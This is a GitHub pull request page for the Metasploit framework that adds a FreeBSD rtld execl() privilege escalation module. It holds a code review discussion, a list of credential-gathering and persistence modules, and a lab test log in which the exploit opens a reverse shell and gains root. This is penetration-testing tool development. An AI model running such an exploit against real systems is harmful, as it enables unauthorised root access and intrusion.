Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add FreeBSD rtld execl() Privilege Escalation module #11808

Merged
merged 1 commit into from May 20, 2019

Conversation

Projects
None yet
4 participants
@bcoles
Copy link
Contributor

commented May 3, 2019

Add FreeBSD rtld execl() Privilege Escalation module

@bcoles bcoles added module docs labels May 3, 2019

@space-r7 space-r7 self-assigned this May 15, 2019

end
vprint_good "FreeBSD version #{kernel_release} appears vulnerable"

unless command_exists? 'gcc'

This comment has been minimized.

Copy link
@cbrnrd

This comment has been minimized.

Copy link
@bcoles

bcoles May 20, 2019

Author Contributor

It does, but this is a FreeBSD module.

The mixins are a mess, and not something I want to tackle in this PR.

Despite BSD and FreeBSD being treated as different platforms in exploit and payload contexts, there are no BSD or FreeBSD mixins. Instead, the closest match is the Unix mixin, which happens to also import msf/core/post/linux/system.

Importing a mixin for a different platform for a single method (that's 1 line long) didn't seem appropriate. This pollutes the namespace and is more likely to introduce issues if the Linux mixins change in the future.

Similarly, there's a method for the is_root? check in the Linux mixins.

Ideally, the UNIX mixin should be updated to support is_root? and has_gcc?, and remove the dependency on msf/core/post/linux/system. The following modules will also need to be updated. Not something I want to tackle in this PR. I think some of the following are unnecessarily including the Unix mixin, and could instead simply import the Linux mixin.

$ grep -rn Msf::Post::Unix modules/
modules/exploits/linux/local/autostart_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/rc_local_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/service_persistence.rb:10:  include Msf::Post::Unix
modules/exploits/linux/local/cron_persistence.rb:10:  include Msf::Post::Unix
modules/post/linux/gather/ecryptfs_creds.rb:8:  include Msf::Post::Unix
modules/post/linux/manage/sshkey_persistence.rb:14:  include Msf::Post::Unix
modules/post/linux/manage/pseudo_shell.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/maven_creds.rb:11:  include Msf::Post::Unix
modules/post/multi/gather/lastpass_creds.rb:13:  include Msf::Post::Unix
modules/post/multi/gather/docker_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/rsyncd_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/rubygems_api_key.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/fetchmailrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/aws_keys.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/netrc_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/ssh_creds.rb:10:  include Msf::Post::Unix
modules/post/multi/gather/gpg_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/dbvis_enum.rb:12:  include Msf::Post::Unix
modules/post/multi/gather/irssi_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/remmina_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/gather/pgpass_creds.rb:8:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_add_db_admin.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/hsts_eraser.rb:10:  include Msf::Post::Unix
modules/post/multi/manage/dbvis_query.rb:10:  include Msf::Post::Unix
@space-r7

This comment has been minimized.

Copy link
Contributor

commented May 20, 2019

Tested on Freebsd 8.0:

msf5 exploit(multi/ssh/sshexec) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1001(a_user) gid=1001(a_user) groups=1001(a_user),0(wheel)
background

Background session 1? [y/N]  y
msf5 exploit(multi/ssh/sshexec) > use exploit/freebsd/local/rtld_execl_priv_esc 
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set session 1
session => 1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(freebsd/local/rtld_execl_priv_esc) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] gcc is installed
[*] Writing '/tmp/.Kw5aja.c' (147 bytes) ...
[*] Writing '/tmp/.3jsxsvcw.c' (365 bytes) ...
[*] Writing '/tmp/.tSblgW0' (172 bytes) ...
[*] Launching exploit...
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.135:65296) at 2019-05-20 11:52:45 -0500
[+] Deleted /tmp/.Kw5aja.c
[+] Deleted /tmp/.Kw5aja.o
[+] Deleted /tmp/.wAZZN.0
[+] Deleted /tmp/.3jsxsvcw.c
[+] Deleted /tmp/.3jsxsvcw
[+] Deleted /tmp/.tSblgW0

id
uid=0(root) gid=0(wheel) groups=0(wheel)

I modified sshexec to get the low-privileged shell on the FreeBSD target and just noticed you updated sshexec in another PR that adds the proper targets. Thanks for doing that!

The code LGTM, so I'll get this landed soon.

@space-r7 space-r7 merged commit 2ee7517 into rapid7:master May 20, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

space-r7 added a commit that referenced this pull request May 20, 2019

@bcoles bcoles deleted the bcoles:rtld_execl_priv_esc branch May 20, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

commented May 20, 2019

Release Notes

This module results in a shell with root privileges in FreeBSD by exploiting a vulnerability in the run-time link-editor (rtld). Exploiting this vulnerability allows for loading arbitrary objects via LD_PRELOAD that can result in privileged code execution.

jmartin-r7 added a commit that referenced this pull request May 20, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.